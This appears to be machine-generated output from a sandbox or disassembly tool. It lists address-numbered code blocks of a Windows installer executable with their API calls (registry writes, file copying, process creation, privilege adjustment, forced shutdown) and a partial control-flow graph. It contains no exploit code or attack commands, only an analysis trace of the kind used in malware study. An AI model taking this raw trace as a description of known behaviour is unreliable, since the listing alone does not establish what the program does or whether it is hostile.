ImageList_Destroy 5492->5502 5514 405346 5492->5514 5493->5484 5498 404499 18 API calls 5494->5498 5495 405251 SendMessageW 5495->5485 5496 404500 8 API calls 5500 40550c 5496->5500 5512 405064 5498->5512 5504 4052cd SendMessageW 5499->5504 5499->5523 5505 40533f GlobalFree 5501->5505 5501->5514 5502->5501 5503 4054c0 5508 4054d2 ShowWindow GetDlgItem ShowWindow 5503->5508 5503->5523 5507 4052e0 5504->5507 5505->5514 5506 40513f GetWindowLongW SetWindowLongW 5509 405158 5506->5509 5515 4052f1 SendMessageW 5507->5515 5508->5523 5510 405175 5509->5510 5511 40515d ShowWindow 5509->5511 5533 4044ce SendMessageW 5510->5533 5532 4044ce SendMessageW 5511->5532 5512->5506 5513 4050b7 SendMessageW 5512->5513 5516 40513a 5512->5516 5520 4050f5 SendMessageW 5512->5520 5521 405109 SendMessageW 5512->5521 5513->5512 5514->5503 5526 405381 5514->5526 5539 404ed4 5514->5539 5515->5490 5516->5506 5516->5509 5519->5485 5519->5495 5520->5512 5521->5512 5523->5496 5524 40548b 5525 405496 InvalidateRect 5524->5525 5528 4054a2 5524->5528 5525->5528 5527 4053af SendMessageW 5526->5527 5531 4053c5 5526->5531 5527->5531 5528->5503 5548 404e0f 5528->5548 5530 405439 SendMessageW SendMessageW 5530->5531 5531->5524 5531->5530 5532->5523 5533->5487 5535 404eb3 SendMessageW 5534->5535 5536 404e77 GetMessagePos ScreenToClient SendMessageW 5534->5536 5538 404eab 5535->5538 5537 404eb0 5536->5537 5536->5538 5537->5535 5538->5519 5551 40653d lstrcpynW 5539->5551 5541 404ee7 5552 406484 wsprintfW 5541->5552 5543 404ef1 5544 40140b 2 API calls 5543->5544 5545 404efa 5544->5545 5553 40653d lstrcpynW 5545->5553 5547 404f01 5547->5526 5554 404d46 5548->5554 5550 404e24 5550->5503 5551->5541 5552->5543 5553->5547 5555 404d5f 5554->5555 5556 40657a 17 API calls 5555->5556 5557 404dc3 5556->5557 5558 40657a 17 API calls 5557->5558 5559 404dce 5558->5559 5560 40657a 17 API calls 5559->5560 5561 404de4 lstrlenW wsprintfW SetDlgItemTextW 5560->5561 5561->5550 5145 404609 lstrlenW 5146 404628 5145->5146 5147 40462a WideCharToMultiByte 5145->5147 5146->5147 5331 40248a 5332 402da6 17 API calls 5331->5332 5333 40249c 5332->5333 5334 402da6 17 API calls 5333->5334 5335 4024a6 5334->5335 5336 402c2a 5335->5336 5337 4024de 5335->5337 5338 402da6 17 API calls 5335->5338 5339 4024ea 5337->5339 5341 402d84 17 API calls 5337->5341 5340 4024d4 lstrlenW 5338->5340 5342 402509 RegSetValueExW 5339->5342 5343 4032b4 31 API calls 5339->5343 5340->5337 5341->5339 5344 40251f RegCloseKey 5342->5344 5343->5342 5344->5336 5694 40498a 5695 4049b6 5694->5695 5696 4049c7 5694->5696 5755 405b81 GetDlgItemTextW 5695->5755 5697 4049d3 GetDlgItem 5696->5697 5704 404a32 5696->5704 5699 4049e7 5697->5699 5703 4049fb SetWindowTextW 5699->5703 5708 405eb7 4 API calls 5699->5708 5700 404b16 5705 404cc5 5700->5705 5757 405b81 GetDlgItemTextW 5700->5757 5701 4049c1 5702 4067c4 5 API calls 5701->5702 5702->5696 5709 404499 18 API calls 5703->5709 5704->5700 5704->5705 5710 40657a 17 API calls 5704->5710 5707 404500 8 API calls 5705->5707 5712 404cd9 5707->5712 5713 4049f1 5708->5713 5714 404a17 5709->5714 5715 404aa6 SHBrowseForFolderW 5710->5715 5711 404b46 5716 405f14 18 API calls 5711->5716 5713->5703 5720 405e0c 3 API calls 5713->5720 5717 404499 18 API calls 5714->5717 5715->5700 5718 404abe CoTaskMemFree 5715->5718 5719 404b4c 5716->5719 5721 404a25 5717->5721 5722 405e0c 3 API calls 5718->5722 5758 40653d lstrcpynW 5719->5758 5720->5703 5756 4044ce SendMessageW 5721->5756 5724 404acb 5722->5724 5727 404b02 SetDlgItemTextW 5724->5727 5731 40657a 17 API calls 5724->5731 5726 404a2b 5730 40690a 5 API calls 5726->5730 5727->5700 5728 404b63 5729 40690a 5 API calls 5728->5729 5737 404b6a 5729->5737 5730->5704 5732 404aea lstrcmpiW 5731->5732 5732->5727 5734 404afb lstrcatW 5732->5734 5733 404bab 5759 40653d lstrcpynW 5733->5759 5734->5727 5736 404bb2 5738 405eb7 4 API calls 5736->5738 5737->5733 5742 405e58 2 API calls 5737->5742 5743 404c03 5737->5743 5739 404bb8 GetDiskFreeSpaceW 5738->5739 5741 404bdc MulDiv 5739->5741 5739->5743 5741->5743 5742->5737 5744 404c74 5743->5744 5746 404e0f 20 API calls 5743->5746 5745 404c97 5744->5745 5747 40140b 2 API calls 5744->5747 5760 4044bb KiUserCallbackDispatcher 5745->5760 5748 404c61 5746->5748 5747->5745 5749 404c76 SetDlgItemTextW 5748->5749 5750 404c66 5748->5750 5749->5744 5752 404d46 20 API calls 5750->5752 5752->5744 5753 404cb3 5753->5705 5754 4048e3 SendMessageW 5753->5754 5754->5705 5755->5701 5756->5726 5757->5711 5758->5728 5759->5736 5760->5753 5562 40290b 5563 402da6 17 API calls 5562->5563 5564 402912 FindFirstFileW 5563->5564 5565 402925 5564->5565 5566 40293a 5564->5566 5567 402943 5566->5567 5570 406484 wsprintfW 5566->5570 5571 40653d lstrcpynW 5567->5571 5570->5567 5571->5565 5572 40190c 5573 401943 5572->5573 5574 402da6 17 API calls 5573->5574 5575 401948 5574->5575 5576 405c49 67 API calls 5575->5576 5577 401951 5576->5577 5761 40558c CallWindowProcW 5762 405599 5761->5762 5578 40190f 5579 402da6 17 API calls 5578->5579 5580 401916 5579->5580 5581 405b9d MessageBoxIndirectW 5580->5581 5582 40191f 5581->5582 5346 401491 5347 40559f 24 API calls 5346->5347 5348 401498 5347->5348 5349 402891 5350 402898 5349->5350 5351 402ba9 5349->5351 5352 402d84 17 API calls 5350->5352 5353 40289f 5352->5353 5354 4028ae SetFilePointer 5353->5354 5354->5351 5355 4028be 5354->5355 5357 406484 wsprintfW 5355->5357 5357->5351 5583 401f12 5584 402da6 17 API calls 5583->5584 5585 401f18 5584->5585 5586 402da6 17 API calls 5585->5586 5587 401f21 5586->5587 5588 402da6 17 API calls 5587->5588 5589 401f2a 5588->5589 5590 402da6 17 API calls 5589->5590 5591 401f33 5590->5591 5592 401423 24 API calls 5591->5592 5593 401f3a 5592->5593 5600 405b63 ShellExecuteExW 5593->5600 5595 401f82 5598 40292e 5595->5598 5601 4069b5 WaitForSingleObject 5595->5601 5597 401f9f CloseHandle 5597->5598 5600->5595 5602 4069cf 5601->5602 5603 4069e1 GetExitCodeProcess 5602->5603 5604 406946 2 API calls 5602->5604 5603->5597 5605 4069d6 WaitForSingleObject 5604->5605 5605->5602 5606 401d17 5607 402d84 17 API calls 5606->5607 5608 401d1d IsWindow 5607->5608 5609 401a20 5608->5609 5148 401e19 SendMessageW 5149 401e33 5148->5149 5151 401e3f 5148->5151 5150 401e38 DeleteObject 5149->5150 5149->5151 5150->5151 4509 403f9a 4510 403fb2 4509->4510 4511 404113 4509->4511 4510->4511 4514 403fbe 4510->4514 4512 404164 4511->4512 4513 404124 GetDlgItem GetDlgItem 4511->4513 4516 4041be 4512->4516 4528 401389 2 API calls 4512->4528 4515 404499 18 API calls 4513->4515 4517 403fc9 SetWindowPos 4514->4517 4518 403fdc 4514->4518 4519 40414e SetClassLongW 4515->4519 4529 40410e 4516->4529 4582 4044e5 4516->4582 4517->4518 4521 403fe5 ShowWindow 4518->4521 4522 404027 4518->4522 4525 40140b 2 API calls 4519->4525 4523 404100 4521->4523 4524 404005 GetWindowLongW 4521->4524 4526 404046 4522->4526 4527 40402f DestroyWindow 4522->4527 4604 404500 4523->4604 4524->4523 4530 40401e ShowWindow 4524->4530 4525->4512 4532 40404b SetWindowLongW 4526->4532 4533 40405c 4526->4533 4531 404422 4527->4531 4534 404196 4528->4534 4530->4522 4531->4529 4540 404453 ShowWindow 4531->4540 4532->4529 4533->4523 4538 404068 GetDlgItem 4533->4538 4534->4516 4539 40419a SendMessageW 4534->4539 4536 40140b 2 API calls 4551 4041d0 4536->4551 4537 404424 DestroyWindow EndDialog 4537->4531 4541 404096 4538->4541 4542 404079 SendMessageW IsWindowEnabled 4538->4542 4539->4529 4540->4529 4544 4040a3 4541->4544 4546 4040ea SendMessageW 4541->4546 4547 4040b6 4541->4547 4555 40409b 4541->4555 4542->4529 4542->4541 4543 40657a 17 API calls 4543->4551 4544->4546 4544->4555 4546->4523 4548 4040d3 4547->4548 4549 4040be 4547->4549 4553 40140b 2 API calls 4548->4553 4598 40140b 4549->4598 4550 4040d1 4550->4523 4551->4529 4551->4536 4551->4537 4551->4543 4554 404499 18 API calls 4551->4554 4573 404364 DestroyWindow 4551->4573 4585 404499 4551->4585 4556 4040da 4553->4556 4554->4551 4601 404472 4555->4601 4556->4523 4556->4555 4558 40424b GetDlgItem 4559 404260 4558->4559 4560 404268 ShowWindow KiUserCallbackDispatcher 4558->4560 4559->4560 4588 4044bb KiUserCallbackDispatcher 4560->4588 4562 404292 EnableWindow 4567 4042a6 4562->4567 4563 4042ab GetSystemMenu EnableMenuItem SendMessageW 4564 4042db SendMessageW 4563->4564 4563->4567 4564->4567 4567->4563 4589 4044ce SendMessageW 4567->4589 4590 403f7b 4567->4590 4593 40653d lstrcpynW 4567->4593 4569 40430a lstrlenW 4570 40657a 17 API calls 4569->4570 4571 404320 SetWindowTextW 4570->4571 4594 401389 4571->4594 4573->4531 4574 40437e CreateDialogParamW 4573->4574 4574->4531 4575 4043b1 4574->4575 4576 404499 18 API calls 4575->4576 4577 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4576->4577 4578 401389 2 API calls 4577->4578 4579 404402 4578->4579 4579->4529 4580 40440a ShowWindow 4579->4580 4581 4044e5 SendMessageW 4580->4581 4581->4531 4583 4044fd 4582->4583 4584 4044ee SendMessageW 4582->4584 4583->4551 4584->4583 4586 40657a 17 API calls 4585->4586 4587 4044a4 SetDlgItemTextW 4586->4587 4587->4558 4588->4562 4589->4567 4591 40657a 17 API calls 4590->4591 4592 403f89 SetWindowTextW 4591->4592 4592->4567 4593->4569 4596 401390 4594->4596 4595 4013fe 4595->4551 4596->4595 4597 4013cb MulDiv SendMessageW 4596->4597 4597->4596 4599 401389 2 API calls 4598->4599 4600 401420 4599->4600 4600->4555 4602 404479 4601->4602 4603 40447f SendMessageW 4601->4603 4602->4603 4603->4550 4605 4045c3 4604->4605 4606 404518 GetWindowLongW 4604->4606 4605->4529 4606->4605 4607 40452d 4606->4607 4607->4605 4608 40455a GetSysColor 4607->4608 4609 40455d 4607->4609 4608->4609 4610 404563 SetTextColor 4609->4610 4611 40456d SetBkMode 4609->4611 4610->4611 4612 404585 GetSysColor 4611->4612 4613 40458b 4611->4613 4612->4613 4614 404592 SetBkColor 4613->4614 4615 40459c 4613->4615 4614->4615 4615->4605 4616 4045b6 CreateBrushIndirect 4615->4616 4617 4045af DeleteObject 4615->4617 4616->4605 4617->4616 5610 7166103d 5613 7166101b 5610->5613 5614 716615b6 GlobalFree 5613->5614 5615 71661020 5614->5615 5616 71661027 GlobalAlloc 5615->5616 5617 71661024 5615->5617 5616->5617 5618 716615dd 3 API calls 5617->5618 5619 7166103b 5618->5619 5763 401b9b 5764 401bec 5763->5764 5767 401ba8 5763->5767 5765 401bf1 5764->5765 5766 401c16 GlobalAlloc 5764->5766 5776 40239d 5765->5776 5784 40653d lstrcpynW 5765->5784 5769 40657a 17 API calls 5766->5769 5768 401c31 5767->5768 5772 401bbf 5767->5772 5770 40657a 17 API calls 5768->5770 5768->5776 5769->5768 5773 402397 5770->5773 5782 40653d lstrcpynW 5772->5782 5773->5776 5777 405b9d MessageBoxIndirectW 5773->5777 5774 401c03 GlobalFree 5774->5776 5777->5776 5778 401bce 5783 40653d lstrcpynW 5778->5783 5780 401bdd 5785 40653d lstrcpynW 5780->5785 5782->5778 5783->5780 5784->5774 5785->5776 5152 40261c 5153 402da6 17 API calls 5152->5153 5154 402623 5153->5154 5157 40602d GetFileAttributesW CreateFileW 5154->5157 5156 40262f 5157->5156 5358 40149e 5359 4014ac PostQuitMessage 5358->5359 5360 40239d 5358->5360 5359->5360 5786 40259e 5787 402de6 17 API calls 5786->5787 5788 4025a8 5787->5788 5789 402d84 17 API calls 5788->5789 5790 4025b1 5789->5790 5791 40292e 5790->5791 5792 4025d9 RegEnumValueW 5790->5792 5793 4025cd RegEnumKeyW 5790->5793 5794 4025ee RegCloseKey 5792->5794 5793->5794 5794->5791 5796 4015a3 5797 402da6 17 API calls 5796->5797 5798 4015aa SetFileAttributesW 5797->5798 5799 4015bc 5798->5799 5800 401fa4 5801 402da6 17 API calls 5800->5801 5802 401faa 5801->5802 5803 40559f 24 API calls 5802->5803 5804 401fb4 5803->5804 5805 405b20 2 API calls 5804->5805 5806 401fba 5805->5806 5807 401fdd CloseHandle 5806->5807 5808 4069b5 5 API calls 5806->5808 5811 40292e 5806->5811 5807->5811 5810 401fcf 5808->5810 5810->5807 5813 406484 wsprintfW 5810->5813 5813->5807 5620 71661000 5621 7166101b 5 API calls 5620->5621 5622 71661019 5621->5622 5623 405526 5624 4044e5 SendMessageW 5623->5624 5625 405533 5624->5625 5158 40202a 5159 402da6 17 API calls 5158->5159 5160 402031 5159->5160 5161 40690a 5 API calls 5160->5161 5162 402040 5161->5162 5163 4020cc 5162->5163 5164 40205c GlobalAlloc 5162->5164 5164->5163 5165 402070 5164->5165 5166 40690a 5 API calls 5165->5166 5167 402077 5166->5167 5168 40690a 5 API calls 5167->5168 5169 402081 5168->5169 5169->5163 5173 406484 wsprintfW 5169->5173 5171 4020ba 5174 406484 wsprintfW 5171->5174 5173->5171 5174->5163 5626 40252a 5627 402de6 17 API calls 5626->5627 5628 402534 5627->5628 5629 402da6 17 API calls 5628->5629 5630 40253d 5629->5630 5631 402548 RegQueryValueExW 5630->5631 5632 40292e 5630->5632 5633 402568 5631->5633 5636 40256e RegCloseKey 5631->5636 5633->5636 5637 406484 wsprintfW 5633->5637 5636->5632 5637->5636 5814 4021aa 5815 402da6 17 API calls 5814->5815 5816 4021b1 5815->5816 5817 402da6 17 API calls 5816->5817 5818 4021bb 5817->5818 5819 402da6 17 API calls 5818->5819 5820 4021c5 5819->5820 5821 402da6 17 API calls 5820->5821 5822 4021cf 5821->5822 5823 402da6 17 API calls 5822->5823 5824 4021d9 5823->5824 5825 402218 CoCreateInstance 5824->5825 5826 402da6 17 API calls 5824->5826 5827 402237 5825->5827 5826->5825 5828 401423 24 API calls 5827->5828 5829 4022f6 5827->5829 5828->5829 5830 403baa 5831 403bb5 5830->5831 5832 403bbc GlobalAlloc 5831->5832 5833 403bb9 5831->5833 5832->5833 5175 7166170d 5181 716615b6 5175->5181 5177 7166176b GlobalFree 5178 71661725 5178->5177 5179 71661740 5178->5179 5180 71661757 VirtualFree 5178->5180 5179->5177 5180->5177 5183 716615bc 5181->5183 5182 716615c2 5182->5178 5183->5182 5184 716615ce GlobalFree 5183->5184 5184->5178 4628 40352d SetErrorMode GetVersionExW 4629 4035b7 4628->4629 4630 40357f GetVersionExW 4628->4630 4631 403610 4629->4631 4632 40690a 5 API calls 4629->4632 4630->4629 4633 40689a 3 API calls 4631->4633 4632->4631 4634 403626 lstrlenA 4633->4634 4634->4631 4635 403636 4634->4635 4636 40690a 5 API calls 4635->4636 4637 40363d 4636->4637 4638 40690a 5 API calls 4637->4638 4639 403644 4638->4639 4640 40690a 5 API calls 4639->4640 4641 403650 #17 OleInitialize SHGetFileInfoW 4640->4641 4719 40653d lstrcpynW 4641->4719 4644 40369d GetCommandLineW 4720 40653d lstrcpynW 4644->4720 4646 4036af 4647 405e39 CharNextW 4646->4647 4648 4036d5 CharNextW 4647->4648 4658 4036e6 4648->4658 4649 4037e4 4650 4037f8 GetTempPathW 4649->4650 4721 4034fc 4650->4721 4652 403810 4653 403814 GetWindowsDirectoryW lstrcatW 4652->4653 4654 40386a DeleteFileW 4652->4654 4656 4034fc 12 API calls 4653->4656 4731 40307d GetTickCount GetModuleFileNameW 4654->4731 4655 405e39 CharNextW 4655->4658 4659 403830 4656->4659 4658->4649 4658->4655 4663 4037e6 4658->4663 4659->4654 4662 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4659->4662 4660 40387d 4661 403941 4660->4661 4667 405e39 CharNextW 4660->4667 4703 403932 4660->4703 4823 403b12 4661->4823 4666 4034fc 12 API calls 4662->4666 4815 40653d lstrcpynW 4663->4815 4670 403862 4666->4670 4683 40389f 4667->4683 4670->4654 4670->4661 4671 403a69 4830 405b9d 4671->4830 4672 403a7e 4674 403a86 GetCurrentProcess OpenProcessToken 4672->4674 4675 403afc ExitProcess 4672->4675 4680 403acc 4674->4680 4681 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 4674->4681 4677 403908 4685 405f14 18 API calls 4677->4685 4678 403949 4684 405b08 5 API calls 4678->4684 4682 40690a 5 API calls 4680->4682 4681->4680 4686 403ad3 4682->4686 4683->4677 4683->4678 4687 40394e lstrcatW 4684->4687 4688 403914 4685->4688 4689 403ae8 ExitWindowsEx 4686->4689 4692 403af5 4686->4692 4690 40396a lstrcatW lstrcmpiW 4687->4690 4691 40395f lstrcatW 4687->4691 4688->4661 4816 40653d lstrcpynW 4688->4816 4689->4675 4689->4692 4690->4661 4693 40398a 4690->4693 4691->4690 4695 40140b 2 API calls 4692->4695 4696 403996 4693->4696 4697 40398f 4693->4697 4695->4675 4701 405aeb 2 API calls 4696->4701 4700 405a6e 4 API calls 4697->4700 4698 403927 4817 40653d lstrcpynW 4698->4817 4704 403994 4700->4704 4702 40399b SetCurrentDirectoryW 4701->4702 4705 4039b8 4702->4705 4706 4039ad 4702->4706 4759 403bec 4703->4759 4704->4702 4819 40653d lstrcpynW 4705->4819 4818 40653d lstrcpynW 4706->4818 4709 40657a 17 API calls 4710 4039fa DeleteFileW 4709->4710 4711 403a06 CopyFileW 4710->4711 4716 4039c5 4710->4716 4711->4716 4712 403a50 4713 4062fd 36 API calls 4712->4713 4713->4661 4714 4062fd 36 API calls 4714->4716 4715 40657a 17 API calls 4715->4716 4716->4709 4716->4712 4716->4714 4716->4715 4718 403a3a CloseHandle 4716->4718 4820 405b20 CreateProcessW 4716->4820 4718->4716 4719->4644 4720->4646 4722 4067c4 5 API calls 4721->4722 4724 403508 4722->4724 4723 403512 4723->4652 4724->4723 4725 405e0c 3 API calls 4724->4725 4726 40351a 4725->4726 4727 405aeb 2 API calls 4726->4727 4728 403520 4727->4728 4729 40605c 2 API calls 4728->4729 4730 40352b 4729->4730 4730->4652 4834 40602d GetFileAttributesW CreateFileW 4731->4834 4733 4030bd 4753 4030cd 4733->4753 4835 40653d lstrcpynW 4733->4835 4735 4030e3 4736 405e58 2 API calls 4735->4736 4737 4030e9 4736->4737 4836 40653d lstrcpynW 4737->4836 4739 4030f4 GetFileSize 4740 4031ee 4739->4740 4758 40310b 4739->4758 4837 403019 4740->4837 4742 4031f7 4744 403227 GlobalAlloc 4742->4744 4742->4753 4872 4034e5 SetFilePointer 4742->4872 4848 4034e5 SetFilePointer 4744->4848 4745 40325a 4750 403019 6 API calls 4745->4750 4748 403210 4751 4034cf ReadFile 4748->4751 4749 403242 4849 4032b4 4749->4849 4750->4753 4754 40321b 4751->4754 4753->4660 4754->4744 4754->4753 4755 403019 6 API calls 4755->4758 4756 40324e 4756->4753 4756->4756 4757 40328b SetFilePointer 4756->4757 4757->4753 4758->4740 4758->4745 4758->4753 4758->4755 4869 4034cf 4758->4869 4760 40690a 5 API calls 4759->4760 4761 403c00 4760->4761 4762 403c06 4761->4762 4763 403c18 4761->4763 4893 406484 wsprintfW 4762->4893 4764 40640b 3 API calls 4763->4764 4765 403c48 4764->4765 4767 403c67 lstrcatW 4765->4767 4768 40640b 3 API calls 4765->4768 4769 403c16 4767->4769 4768->4767 4878 403ec2 4769->4878 4772 405f14 18 API calls 4774 403c99 4772->4774 4773 403d2d 4775 405f14 18 API calls 4773->4775 4774->4773 4776 40640b 3 API calls 4774->4776 4777 403d33 4775->4777 4778 403ccb 4776->4778 4779 403d43 LoadImageW 4777->4779 4780 40657a 17 API calls 4777->4780 4778->4773 4785 403cec lstrlenW 4778->4785 4789 405e39 CharNextW 4778->4789 4781 403de9 4779->4781 4782 403d6a RegisterClassW 4779->4782 4780->4779 4784 40140b 2 API calls 4781->4784 4783 403da0 SystemParametersInfoW CreateWindowExW 4782->4783 4814 403df3 4782->4814 4783->4781 4788 403def 4784->4788 4786 403d20 4785->4786 4787 403cfa lstrcmpiW 4785->4787 4791 405e0c 3 API calls 4786->4791 4787->4786 4790 403d0a GetFileAttributesW 4787->4790 4794 403ec2 18 API calls 4788->4794 4788->4814 4792 403ce9 4789->4792 4793 403d16 4790->4793 4795 403d26 4791->4795 4792->4785 4793->4786 4796 405e58 2 API calls 4793->4796 4797 403e00 4794->4797 4894 40653d lstrcpynW 4795->4894 4796->4786 4799 403e0c ShowWindow 4797->4799 4800 403e8f 4797->4800 4802 40689a 3 API calls 4799->4802 4886 405672 OleInitialize 4800->4886 4804 403e24 4802->4804 4803 403e95 4805 403eb1 4803->4805 4806 403e99 4803->4806 4807 403e32 GetClassInfoW 4804->4807 4809 40689a 3 API calls 4804->4809 4808 40140b 2 API calls 4805->4808 4813 40140b 2 API calls 4806->4813 4806->4814 4810 403e46 GetClassInfoW RegisterClassW 4807->4810 4811 403e5c DialogBoxParamW 4807->4811 4808->4814 4809->4807 4810->4811 4812 40140b 2 API calls 4811->4812 4812->4814 4813->4814 4814->4661 4815->4650 4816->4698 4817->4703 4818->4705 4819->4716 4821 405b53 CloseHandle 4820->4821 4822 405b5f 4820->4822 4821->4822 4822->4716 4824 403b2a 4823->4824 4825 403b1c CloseHandle 4823->4825 4896 403b57 4824->4896 4825->4824 4828 405c49 67 API calls 4829 403a5e OleUninitialize 4828->4829 4829->4671 4829->4672 4832 405bb2 4830->4832 4831 403a76 ExitProcess 4832->4831 4833 405bc6 MessageBoxIndirectW 4832->4833 4833->4831 4834->4733 4835->4735 4836->4739 4838 403022 4837->4838 4839 40303a 4837->4839 4842 403032 4838->4842 4843 40302b DestroyWindow 4838->4843 4840 403042 4839->4840 4841 40304a GetTickCount 4839->4841 4873 406946 4840->4873 4845 403058 CreateDialogParamW ShowWindow 4841->4845 4846 40307b 4841->4846 4842->4742 4843->4842 4845->4846 4846->4742 4848->4749 4850 4032cd 4849->4850 4851 4032fb 4850->4851 4877 4034e5 SetFilePointer 4850->4877 4852 4034cf ReadFile 4851->4852 4854 403306 4852->4854 4855 403468 4854->4855 4856 403318 GetTickCount 4854->4856 4858 403452 4854->4858 4857 4034aa 4855->4857 4862 40346c 4855->4862 4856->4858 4865 403367 4856->4865 4859 4034cf ReadFile 4857->4859 4858->4756 4859->4858 4860 4034cf ReadFile 4860->4865 4861 4034cf ReadFile 4861->4862 4862->4858 4862->4861 4863 4060df WriteFile 4862->4863 4863->4862 4864 4033bd GetTickCount 4864->4865 4865->4858 4865->4860 4865->4864 4866 4033e2 MulDiv wsprintfW 4865->4866 4868 4060df WriteFile 4865->4868 4867 40559f 24 API calls 4866->4867 4867->4865 4868->4865 4870 4060b0 ReadFile 4869->4870 4871 4034e2 4870->4871 4871->4758 4872->4748 4874 406963 PeekMessageW 4873->4874 4875 403048 4874->4875 4876 406959 DispatchMessageW 4874->4876 4875->4742 4876->4874 4877->4851 4879 403ed6 4878->4879 4895 406484 wsprintfW 4879->4895 4881 403f47 4882 403f7b 18 API calls 4881->4882 4884 403f4c 4882->4884 4883 403c77 4883->4772 4884->4883 4885 40657a 17 API calls 4884->4885 4885->4884 4887 4044e5 SendMessageW 4886->4887 4890 405695 4887->4890 4888 4056bc 4889 4044e5 SendMessageW 4888->4889 4891 4056ce OleUninitialize 4889->4891 4890->4888 4892 401389 2 API calls 4890->4892 4891->4803 4892->4890 4893->4769 4894->4773 4895->4881 4897 403b65 4896->4897 4898 403b2f 4897->4898 4899 403b6a FreeLibrary GlobalFree 4897->4899 4898->4828 4899->4898 4899->4899 5185 401a30 5186 402da6 17 API calls 5185->5186 5187 401a39 ExpandEnvironmentStringsW 5186->5187 5188 401a4d 5187->5188 5190 401a60 5187->5190 5189 401a52 lstrcmpW 5188->5189 5188->5190 5189->5190 5834 4023b2 5835 4023c0 5834->5835 5836 4023ba 5834->5836 5838 402da6 17 API calls 5835->5838 5841 4023ce 5835->5841 5837 402da6 17 API calls 5836->5837 5837->5835 5838->5841 5839 402da6 17 API calls 5842 4023dc 5839->5842 5840 402da6 17 API calls 5843 4023e5 WritePrivateProfileStringW 5840->5843 5841->5839 5841->5842 5842->5840 5191 402434 5192 402467 5191->5192 5193 40243c 5191->5193 5195 402da6 17 API calls 5192->5195 5200 402de6 5193->5200 5199 40246e 5195->5199 5197 402da6 17 API calls 5198 402454 RegDeleteValueW RegCloseKey 5197->5198 5198->5199 5201 402da6 17 API calls 5200->5201 5202 402dfd 5201->5202 5203 4063aa RegOpenKeyExW 5202->5203 5204 402443 5203->5204 5204->5197 5204->5199 5638 401735 5639 402da6 17 API calls 5638->5639 5640 40173c SearchPathW 5639->5640 5641 401757 5640->5641 5366 4014b8 5367 4014be 5366->5367 5368 401389 2 API calls 5367->5368 5369 4014c6 5368->5369 5642 401d38 5643 402d84 17 API calls 5642->5643 5644 401d3f 5643->5644 5645 402d84 17 API calls 5644->5645 5646 401d4b GetDlgItem 5645->5646 5647 402638 5646->5647 5205 40263e 5206 402652 5205->5206 5207 40266d 5205->5207 5208 402d84 17 API calls 5206->5208 5209 402672 5207->5209 5210 40269d 5207->5210 5217 402659 5208->5217 5212 402da6 17 API calls 5209->5212 5211 402da6 17 API calls 5210->5211 5213 4026a4 lstrlenW 5211->5213 5214 402679 5212->5214 5213->5217 5222 40655f WideCharToMultiByte 5214->5222 5216 40268d lstrlenA 5216->5217 5218 4026d1 5217->5218 5219 4026e7 5217->5219 5223 40610e SetFilePointer 5217->5223 5218->5219 5220 4060df WriteFile 5218->5220 5220->5219 5222->5216 5224 40612a 5223->5224 5231 406142 5223->5231 5225 4060b0 ReadFile 5224->5225 5226 406136 5225->5226 5227 406173 SetFilePointer 5226->5227 5228 40614b SetFilePointer 5226->5228 5226->5231 5227->5231 5228->5227 5229 406156 5228->5229 5230 4060df WriteFile 5229->5230 5230->5231 5231->5218

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 11 403614 5->11 7 403620-403634 call 40689a lstrlenA 6->7 13 403636-403652 call 40690a * 3 7->13 11->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 25 40365c 21->25 25->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 35 4037f8-403812 GetTempPathW call 4034fc 33->35 36 4036f5-4036fb 34->36 37 4036ee-4036f3 34->37 46 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 35->46 47 40386a-403882 DeleteFileW call 40307d 35->47 39 403702-403706 36->39 40 4036fd-403701 36->40 37->36 37->37 41 4037c6-4037d4 call 405e39 39->41 42 40370c-403712 39->42 40->39 41->32 61 4037d6-4037d7 41->61 44 403714-40371b 42->44 45 40372c-403765 42->45 49 403722 44->49 50 40371d-403720 44->50 51 403781-4037bb 45->51 52 403767-40376c 45->52 46->47 66 403834-403864 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fc 46->66 62 403888-40388e 47->62 63 403a59-403a67 call 403b12 OleUninitialize 47->63 49->45 50->45 50->49 58 4037c3-4037c5 51->58 59 4037bd-4037c1 51->59 52->51 56 40376e-403776 52->56 64 403778-40377b 56->64 65 40377d 56->65 58->41 59->58 67 4037e6-4037f3 call 40653d 59->67 61->32 68 403894-4038a7 call 405e39 62->68 69 403935-40393c call 403bec 62->69 79 403a69-403a78 call 405b9d ExitProcess 63->79 80 403a7e-403a84 63->80 64->51 64->65 65->51 66->47 66->63 67->35 81 4038f9-403906 68->81 82 4038a9-4038de 68->82 78 403941-403944 69->78 78->63 84 403a86-403a9b GetCurrentProcess OpenProcessToken 80->84 85 403afc-403b04 80->85 89 403908-403916 call 405f14 81->89 90 403949-40395d call 405b08 lstrcatW 81->90 86 4038e0-4038e4 82->86 92 403acc-403ada call 40690a 84->92 93 403a9d-403ac6 LookupPrivilegeValueW AdjustTokenPrivileges 84->93 87 403b06 85->87 88 403b09-403b0c ExitProcess 85->88 95 4038e6-4038eb 86->95 96 4038ed-4038f5 86->96 87->88 89->63 107 40391c-403932 call 40653d * 2 89->107 105 40396a-403984 lstrcatW lstrcmpiW 90->105 106 40395f-403965 lstrcatW 90->106 103 403ae8-403af3 ExitWindowsEx 92->103 104 403adc-403ae6 92->104 93->92 95->96 100 4038f7 95->100 96->86 96->100 100->81 103->85 108 403af5-403af7 call 40140b 103->108 104->103 104->108 109 403a57 105->109 110 40398a-40398d 105->110 106->105 107->69 108->85 109->63 114 403996 call 405aeb 110->114 115 40398f-403994 call 405a6e 110->115 120 40399b-4039ab SetCurrentDirectoryW 114->120 115->120 123 4039b8-4039e4 call 40653d 120->123 124 4039ad-4039b3 call 40653d 120->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 